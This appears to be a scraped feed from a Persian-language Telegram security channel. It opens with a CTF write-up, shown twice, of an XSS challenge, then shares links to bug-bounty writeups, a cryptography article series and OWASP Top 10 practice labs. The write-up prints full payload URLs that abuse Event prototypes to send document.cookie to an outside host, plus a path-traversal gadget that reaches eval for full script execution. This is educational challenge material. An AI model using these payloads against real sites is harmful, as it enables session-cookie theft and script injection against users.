Forwarded from BugBounty & Hacking Resources (Meydi)
خب چلنج شاهرخ خیلی خوب بود چون ریسترکشن هاش زیاد بود و واسه بیشتر راه ها دستمونو میبست
منم روش اصلی رو اصلا نمیدونستم و واقعا باحال بود . اینکه window.name توی کروم برای هر تب (window) مقدارش بعد از جابه جایی بین origin های مختلف تغییر نمیکنه
حالا روشی که من رفتم (steal cookie only):
https://rouhbakhsh.xyz/index2.php?j&q=x%22;window.onload=fetch;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name=%22//google.com/%22;Event.prototype.message=document.cookie//
من یه چیز خیلی جالبو فهمیدم و با اون تونستم کوکیو بدزدم.
تیکه کد پایینو ببینید:
بعد از اینکه روش های مشابه اینو رفتم دیدم
متوجه شدم که prototype میتونه property های متفاوتی داشته باشه مثل message
حالا اومدم هردو رو باهم نوشتم و یه چیز خیلی عجیب دیدم
و توی الرت:
name: message
اینو دیدم
و خب کار دیگه خیلی ساده شد:
https://rouhbakhsh.xyz/index2.php?j&q=x%22;window.onload=fetch;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name=%22//google.com/%22;Event.prototype.message=document.cookie//
اینجوری کوکی رو میتونی بفرستی واسه هر سایتی که میخوای
روش بعدی FULL XSS
راستش از اولش هم دنبال این بودم که کامل xss کنم و حالا با اون گجت خیلی کارا میشد کرد:
Event.prototype.name="window.location=javanoscript"
من اینجا به بعد سریع به جواب رسیدم و چیز زیادیو تست نکردم. پس اگه با روش دیگه ای زدید حتما تو کامنت بگید:
حالا باید یه جوری مقدار message رو کد js میذاشتم. و متاسفانه اینجا نتونستم با hash بزنم چون مستقیم هشتگ میفتاد اون اول و خرابش میکرد.
ایده ای که سریع به ذهنم رسید
این بود که با
location.pathname
بزنمش
و اینجا یه گجت دیگه هم پیدا کردم:
CSPT
https://rouhbakhsh.xyz//%0Aeval(location.hash.substr(1))'//%2f..%2findex2.php?q=x%22;window.onload=setTimeout;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name=%22window.location=%27javanoscript%22;Event.prototype.message=location.pathname//#alert(origin)
میخواید پیلود رو ببینید چطوری شده. اون setTimeout رو بکنید alert
تشکر زیاد از شاهرخ:
@Sharo_K_h
منم روش اصلی رو اصلا نمیدونستم و واقعا باحال بود . اینکه window.name توی کروم برای هر تب (window) مقدارش بعد از جابه جایی بین origin های مختلف تغییر نمیکنه
حالا روشی که من رفتم (steal cookie only):
https://rouhbakhsh.xyz/index2.php?j&q=x%22;window.onload=fetch;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name=%22//google.com/%22;Event.prototype.message=document.cookie//
من یه چیز خیلی جالبو فهمیدم و با اون تونستم کوکیو بدزدم.
تیکه کد پایینو ببینید:
window.onload=alert;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name
بعد از اینکه روش های مشابه اینو رفتم دیدم
متوجه شدم که prototype میتونه property های متفاوتی داشته باشه مثل message
حالا اومدم هردو رو باهم نوشتم و یه چیز خیلی عجیب دیدم
window.onload=alert;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name="name";Event.prototype.message="message"
و توی الرت:
name: message
اینو دیدم
و خب کار دیگه خیلی ساده شد:
https://rouhbakhsh.xyz/index2.php?j&q=x%22;window.onload=fetch;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name=%22//google.com/%22;Event.prototype.message=document.cookie//
اینجوری کوکی رو میتونی بفرستی واسه هر سایتی که میخوای
روش بعدی FULL XSS
راستش از اولش هم دنبال این بودم که کامل xss کنم و حالا با اون گجت خیلی کارا میشد کرد:
Event.prototype.name="window.location=javanoscript"
window.location=javanoscript : (Event.prototype.message)
من اینجا به بعد سریع به جواب رسیدم و چیز زیادیو تست نکردم. پس اگه با روش دیگه ای زدید حتما تو کامنت بگید:
حالا باید یه جوری مقدار message رو کد js میذاشتم. و متاسفانه اینجا نتونستم با hash بزنم چون مستقیم هشتگ میفتاد اون اول و خرابش میکرد.
javanoscript:#anything
ایده ای که سریع به ذهنم رسید
این بود که با
location.pathname
بزنمش
و اینجا یه گجت دیگه هم پیدا کردم:
CSPT
https://rouhbakhsh.xyz//%0Aeval(location.hash.substr(1))'//%2f..%2findex2.php?q=x%22;window.onload=setTimeout;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name=%22window.location=%27javanoscript%22;Event.prototype.message=location.pathname//#alert(origin)
میخواید پیلود رو ببینید چطوری شده. اون setTimeout رو بکنید alert
تشکر زیاد از شاهرخ:
@Sharo_K_h
Forwarded from GO-TO CVE
https://soltanali0.medium.com/jwt-bugs-and-the-dot-that-changed-everything-%EF%B8%8F-50a0bc31fd66
همین رو یک رایتاپ کوچلوش کردم انشاالله که مفید باشه
همین رو یک رایتاپ کوچلوش کردم انشاالله که مفید باشه
Medium
JWT Bugs and the Dot That Changed Everything ⚔️
Hi, I’m Ali Soltani ( soltanali0 ) , a Red Team researcher and security enthusiast 🛡️. This wasn’t my first bug, and not my last — but…
👾2
🤳🏻 From a Phone Number Tweak to Total Account Takeover
How an RFC 3966-compliant phone number field handed me the keys to user accounts!
https://medium.com/@horamah.71/from-a-phone-number-tweak-to-total-account-takeover-how-an-rfc-3966-compliant-phone-number-156be00dff95
https://x.com/horamah_71/status/1959700293798789218?t=A10_D36wvUKtCmG1daY7-Q&s=19
@hackhive_channel 🐝
How an RFC 3966-compliant phone number field handed me the keys to user accounts!
https://medium.com/@horamah.71/from-a-phone-number-tweak-to-total-account-takeover-how-an-rfc-3966-compliant-phone-number-156be00dff95
https://x.com/horamah_71/status/1959700293798789218?t=A10_D36wvUKtCmG1daY7-Q&s=19
@hackhive_channel 🐝
🔥8❤1
https://medium.com/@panahifarah/ctf-write-up-breaking-a-simple-rsa-file-encryptor-in-c-5766af727ded
به عنوان اولین تجربه عالی بود🫧
به عنوان اولین تجربه عالی بود🫧
Medium
CTF Write-Up: Breaking a Simple RSA File Encryptor in C
CTF cryptography challenges often present simplified versions of real algorithms. In this post, we’ll explore a small C program that…
❤1
Forwarded from HackMeLocal
🕹 مینیچالش آغاز شد
یک ربات شبیهسازی شده ساختهایم که هدفش بررسی دیتابیسهای لو رفته و اطلاعرسانی به کاربر در صورت وجود اطلاعاتش است.
ما میدونیم به نحوی شخصی به تمام اطلاعات دیتابیس ما دسترسی داره تمام پیامهای دریافتی از سمت کاربر را امن کردیم اما همچنان میتواند اطلاعات موجود در دیتابیس ما را مشاهده کند.
در کل میتونید از این ربات استفاده کنید
@HML_Simulation2_Bot
📌 طبق روال، هر کسی که First Blood بشه، رایتآپش داخل کانال منتشر میشه!
#BugBounty #TelegramBot #Vulnrability #CTF #HackMeLocal
@HackMeLocal
یک ربات شبیهسازی شده ساختهایم که هدفش بررسی دیتابیسهای لو رفته و اطلاعرسانی به کاربر در صورت وجود اطلاعاتش است.
ما میدونیم به نحوی شخصی به تمام اطلاعات دیتابیس ما دسترسی داره تمام پیامهای دریافتی از سمت کاربر را امن کردیم اما همچنان میتواند اطلاعات موجود در دیتابیس ما را مشاهده کند.
در کل میتونید از این ربات استفاده کنید
@HML_Simulation2_Bot
📌 طبق روال، هر کسی که First Blood بشه، رایتآپش داخل کانال منتشر میشه!
#BugBounty #TelegramBot #Vulnrability #CTF #HackMeLocal
@HackMeLocal
❤3
Forwarded from BugBounty & Hacking Resources (Meydi)
مقاله زیرو کلیک ato من:
https://mey-d.github.io/posts/zero-click-ato-persian/
امیدوارم لذت ببرید
https://x.com/neotrony/status/1964141250686169414?s=46
https://mey-d.github.io/posts/zero-click-ato-persian/
امیدوارم لذت ببرید
https://x.com/neotrony/status/1964141250686169414?s=46
X (formerly Twitter)
mehdi parandin (@neotrony) on X
English account: @mehdiparandin
❤6
Forwarded from 🕸 Articles
سری مقالات رمزنگاری مقدماتی به زبان ساده از محمد حسن پزشکیان
🔸 1 بررسی مفاهیم اولیه رمزنگاری
🔸 2 بررسی Encoding and Encryption
🔸 3 بررسی Hash & HMAC
🔸 4 بررسی Password Storage, Salt & Pepper
🔸 5 رمزنگاری متقارن یا Symmetric Encryption
🔸6 رمزنگاری نامتقارن یا Asymmetric Encryption
🔸7 امضا و گواهینامه دیجیتال
🔸8 رمزنگاری سخت افزاری و خطرات دولت ها
🔸9 ریاضیات و شرح کارکرد الگریتم های نامتقارن
🔸10 رمزنگاری منحنی بیضوی یا Elliptic-Curve
🔸11 بررسی امنیت پروتوکول های شبکه
🔸12 بررسی حملات رمزنگاری
🔸13 مرور و جمع بندی
#crypto
🔸 1 بررسی مفاهیم اولیه رمزنگاری
🔸 2 بررسی Encoding and Encryption
🔸 3 بررسی Hash & HMAC
🔸 4 بررسی Password Storage, Salt & Pepper
🔸 5 رمزنگاری متقارن یا Symmetric Encryption
🔸6 رمزنگاری نامتقارن یا Asymmetric Encryption
🔸7 امضا و گواهینامه دیجیتال
🔸8 رمزنگاری سخت افزاری و خطرات دولت ها
🔸9 ریاضیات و شرح کارکرد الگریتم های نامتقارن
🔸10 رمزنگاری منحنی بیضوی یا Elliptic-Curve
🔸11 بررسی امنیت پروتوکول های شبکه
🔸12 بررسی حملات رمزنگاری
🔸13 مرور و جمع بندی
#crypto
ویرگول
رمزنگاری مقدماتی به زبان ساده : بررسی مفاهیم اولیه رمزنگاری
بررسی مفاهیم رمزنگاری به صورت ساده با ذکر مثال هایی از دنیای واقعی به همراه مثال های عملی متخص متخصصین حوزه امنیت
❤6👍1
The OWASP Top 10 is a community-driven list of the most critical web application security risks. It exists to raise awareness, guide developers and security teams, and serve as a baseline for testing and hardening applications. Organizations use it for threat modeling, training, and setting minimum security requirements; the list is updated periodically to reflect changing attack trends.
#owasp_stories
@hackhive_channel 🐝
#owasp_stories
@hackhive_channel 🐝
❤3
Hack Hive
The OWASP Top 10 is a community-driven list of the most critical web application security risks. It exists to raise awareness, guide developers and security teams, and serve as a baseline for testing and hardening applications. Organizations use it for threat…
The OWASP Top 10 list was updated in 2021 to reflect modern threats. Compared to 2017, some risks changed position, some were renamed, and new categories appeared. Broken Access Control rose to the top, Sensitive Data Exposure evolved into Cryptographic Failures, and Insecure Design, Software and Data Integrity Failures, and SSRF were introduced. This update highlights how web application risks evolve and why organizations must continuously adapt their security practices.
#owasp_stories
@hackhive_channel 🐝
#owasp_stories
@hackhive_channel 🐝
❤5
Hack Hive
The OWASP Top 10 list was updated in 2021 to reflect modern threats. Compared to 2017, some risks changed position, some were renamed, and new categories appeared. Broken Access Control rose to the top, Sensitive Data Exposure evolved into Cryptographic Failures…
#number1:
Broken Access Control
Broken Access Control happens when applications fail to properly enforce who can access what. As a result, users may read or modify data, escalate privileges, or reach hidden resources. It often shows up as IDOR, missing server-side checks, or misconfigured CORS. Preventing it requires strict server-side authorization, deny-by-default policies, and proper validation of ownership and roles.
Main Categories:
Insecure Direct Object References (IDOR)
Sensitive Data Exposure via weak access rules
Authentication & Authorization Issues
Metadata Manipulation (cookies, tokens, JWT)
Misconfiguration (CORS, forced browsing, open redirect)
Functional Level Access Control Issues
For more information:
https://m.youtube.com/watch?v=_jz5qFWhLcg&pp=ygUfI2Jlc3RidWdib3VudHlib29rc2ZvcmJlZ2lubmVycw%3D%3D
#owasp_stories
@hackhive_channel 🐝
Broken Access Control
Broken Access Control happens when applications fail to properly enforce who can access what. As a result, users may read or modify data, escalate privileges, or reach hidden resources. It often shows up as IDOR, missing server-side checks, or misconfigured CORS. Preventing it requires strict server-side authorization, deny-by-default policies, and proper validation of ownership and roles.
Main Categories:
Insecure Direct Object References (IDOR)
Sensitive Data Exposure via weak access rules
Authentication & Authorization Issues
Metadata Manipulation (cookies, tokens, JWT)
Misconfiguration (CORS, forced browsing, open redirect)
Functional Level Access Control Issues
For more information:
https://m.youtube.com/watch?v=_jz5qFWhLcg&pp=ygUfI2Jlc3RidWdib3VudHlib29rc2ZvcmJlZ2lubmVycw%3D%3D
#owasp_stories
@hackhive_channel 🐝
🔥4⚡1❤1👍1
Hack Hive
#number1: Broken Access Control Broken Access Control happens when applications fail to properly enforce who can access what. As a result, users may read or modify data, escalate privileges, or reach hidden resources. It often shows up as IDOR, missing server…
idor (3).pdf
1.4 MB
#number1_1:
IDOR(Insecure Direct Object References)
For practice:
Easy level=
https://github.com/Laburity/vulnerable-IDOR-lab?utm_source=chatgpt.com
Medium level =
https://portswigger.net/web-security/all-labs#path-traversal
And
https://portswigger.net/web-security/all-labs#access-control-vulnerabilities
And
https://www.hackthebox.com/
And
https://tryhackme.com/challenges
Hard level =
https://pentesterlab.com/exercises/idor-to-shell?utm_source=chatgpt.com
#owasp_series
#idor
@hackhive_channel 🐝
IDOR(Insecure Direct Object References)
For practice:
Easy level=
https://github.com/Laburity/vulnerable-IDOR-lab?utm_source=chatgpt.com
Medium level =
https://portswigger.net/web-security/all-labs#path-traversal
And
https://portswigger.net/web-security/all-labs#access-control-vulnerabilities
And
https://www.hackthebox.com/
And
https://tryhackme.com/challenges
Hard level =
https://pentesterlab.com/exercises/idor-to-shell?utm_source=chatgpt.com
#owasp_series
#idor
@hackhive_channel 🐝
👍6❤3⚡2
Hack Hive
#number1: Broken Access Control Broken Access Control happens when applications fail to properly enforce who can access what. As a result, users may read or modify data, escalate privileges, or reach hidden resources. It often shows up as IDOR, missing server…
Exposure of Sensitive Information.pdf
1.8 MB
#number1_2:
Exposure of sensitive information
For practice:
Essay level=
https://github.com/digininja/DVWA
And
https://tryhackme.com/room/owaspjuiceshop
Medium level=
https://pwning.owasp-juice.shop/companion-guide/latest/part2/sensitive-data-exposure.html
And
https://owasp.org/www-project-webgoat/
And
https://tryhackme.com/room/owasptop10
Hard level=
https://portswigger.net/web-security/information-disclosure
And
https://dev.to/hax/owasp-juice-shop-walkthrough-sensitive-data-exposure-login-amy-fph
And
https://academy.hackthebox.com/academy-lab-relations
#owasp_series
#sensitive_data_exposure
@hackhive_channel 🐝
Exposure of sensitive information
For practice:
Essay level=
https://github.com/digininja/DVWA
And
https://tryhackme.com/room/owaspjuiceshop
Medium level=
https://pwning.owasp-juice.shop/companion-guide/latest/part2/sensitive-data-exposure.html
And
https://owasp.org/www-project-webgoat/
And
https://tryhackme.com/room/owasptop10
Hard level=
https://portswigger.net/web-security/information-disclosure
And
https://dev.to/hax/owasp-juice-shop-walkthrough-sensitive-data-exposure-login-amy-fph
And
https://academy.hackthebox.com/academy-lab-relations
#owasp_series
#sensitive_data_exposure
@hackhive_channel 🐝
❤9⚡1👌1
Forwarded from 🕸 Articles
این کتاب توصیههای ارزشمند و کاربردی از گروهی از هکرهای با تجربه در حوزه باگبانتیه که برای موفقیت تو این عرصه جمعآوری شدن. این راهنماییها از تکنیکهای عمیق تست و استفاده از اتومیشن گرفته تا تمرکز روی نقاط ضعف خاص و مدیریت زمان، بهت کمک میکنه مهارتهات رو تقویت کنی و باگهای با ارزشی پیدا کنی.
❤3
Forwarded from 🕸 Articles
Final Collection of Advice_Persian.pdf
1.3 MB
Hack Hive
#number1: Broken Access Control Broken Access Control happens when applications fail to properly enforce who can access what. As a result, users may read or modify data, escalate privileges, or reach hidden resources. It often shows up as IDOR, missing server…
Authentication & Authorization Issues.pdf
1.3 MB
#number1_3:
Authentication and Authorization issues
For practice:
Easy level =
https://owasp.org/www-project-webgoat/
And https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references
Medium level=
https://owasp.org/www-project-juice-shop/
And https://www.hackthebox.com/machines/access
Hard level=
https://www.hackthebox.com/machines/forest
And https://www.vulnhub.com/entry/kioptrix-level-4,105/
#owasp_series
#authentication_and_authorization_issues
@hackhive_channel 🐝
Authentication and Authorization issues
For practice:
Easy level =
https://owasp.org/www-project-webgoat/
And https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references
Medium level=
https://owasp.org/www-project-juice-shop/
And https://www.hackthebox.com/machines/access
Hard level=
https://www.hackthebox.com/machines/forest
And https://www.vulnhub.com/entry/kioptrix-level-4,105/
#owasp_series
#authentication_and_authorization_issues
@hackhive_channel 🐝
❤5⚡1
Hack Hive
#number1: Broken Access Control Broken Access Control happens when applications fail to properly enforce who can access what. As a result, users may read or modify data, escalate privileges, or reach hidden resources. It often shows up as IDOR, missing server…
Metadata Manipulation.pdf
757.5 KB
#number1_4:
Metadata manipulation
For practice and learning:
easy level=
https://bitcuratorconsortium.org/wp-content/uploads/2022/05/Exiftool-Exercise.pdf
And
https://github.com/frankwxu/digital-forensics-lab
And
https://codehs.com/tutorial/14571
https://www.youtube.com/watch?v=8gL-uCnbLn0
medium level=
https://iritt.medium.com/picoctf-information-forensicschallenge-challenge-walkthrough-0dac21f76105
And
https://dfrws.org/forensic-challenges
And
https://www.cliffsnotes.com/study-notes/21913211
hard level=
https://www.blackhat.com/docs/us-17/wednesday/us-17-Mazurov-Brown-Protecting-Visual-Assets-Digital-Image-Counter-Forensics.pdf
And
https://arxiv.org/abs/2308.04723
And
https://rohit12.medium.com/executed-anti-forensic-lab-using-steganography-e-mail-forensic-and-exif-metadata-techniques-all-d7b1bad61a32
And
https://dfrws.org/forensic-challenges
#owasp_series
#Metadata_manipulation
@hackhive_channel 🐝
Metadata manipulation
For practice and learning:
easy level=
https://bitcuratorconsortium.org/wp-content/uploads/2022/05/Exiftool-Exercise.pdf
And
https://github.com/frankwxu/digital-forensics-lab
And
https://codehs.com/tutorial/14571
https://www.youtube.com/watch?v=8gL-uCnbLn0
medium level=
https://iritt.medium.com/picoctf-information-forensicschallenge-challenge-walkthrough-0dac21f76105
And
https://dfrws.org/forensic-challenges
And
https://www.cliffsnotes.com/study-notes/21913211
hard level=
https://www.blackhat.com/docs/us-17/wednesday/us-17-Mazurov-Brown-Protecting-Visual-Assets-Digital-Image-Counter-Forensics.pdf
And
https://arxiv.org/abs/2308.04723
And
https://rohit12.medium.com/executed-anti-forensic-lab-using-steganography-e-mail-forensic-and-exif-metadata-techniques-all-d7b1bad61a32
And
https://dfrws.org/forensic-challenges
#owasp_series
#Metadata_manipulation
@hackhive_channel 🐝
⚡1😨1
Hack Hive
Metadata Manipulation.pdf
More practise:
https://rohit12.medium.com/executed-anti-forensic-lab-using-steganography-e-mail-forensic-and-exif-metadata-techniques-all-d7b1bad61a32
And
https://portswigger.net/web-security/file-upload
And
https://www.hackthebox.com/machines/meta
And
https://forum.hackthebox.com/t/stego-image-processing-101/1940
And
https://tryhackme.com/room/easysteganography
And
https://www.root-me.org/en/Challenges/Steganography
And
https://tryhackme.com/room/introdigitalforensics
And
https://tryhackme.com/room/linuxfilesystemanalysis
#owasp_series
#Metadata_manipulation
@hackhive_channel 🐝
https://rohit12.medium.com/executed-anti-forensic-lab-using-steganography-e-mail-forensic-and-exif-metadata-techniques-all-d7b1bad61a32
And
https://portswigger.net/web-security/file-upload
And
https://www.hackthebox.com/machines/meta
And
https://forum.hackthebox.com/t/stego-image-processing-101/1940
And
https://tryhackme.com/room/easysteganography
And
https://www.root-me.org/en/Challenges/Steganography
And
https://tryhackme.com/room/introdigitalforensics
And
https://tryhackme.com/room/linuxfilesystemanalysis
#owasp_series
#Metadata_manipulation
@hackhive_channel 🐝
Medium
Executed Anti-Forensic Lab Using Steganography, E-Mail Forensic, and Exif Metadata techniques all of which play crucial roles in…
Greetings, everyone! I’m back with a new article after a long absence. In this write-up, I will attempt to explain everything I know about…
😨1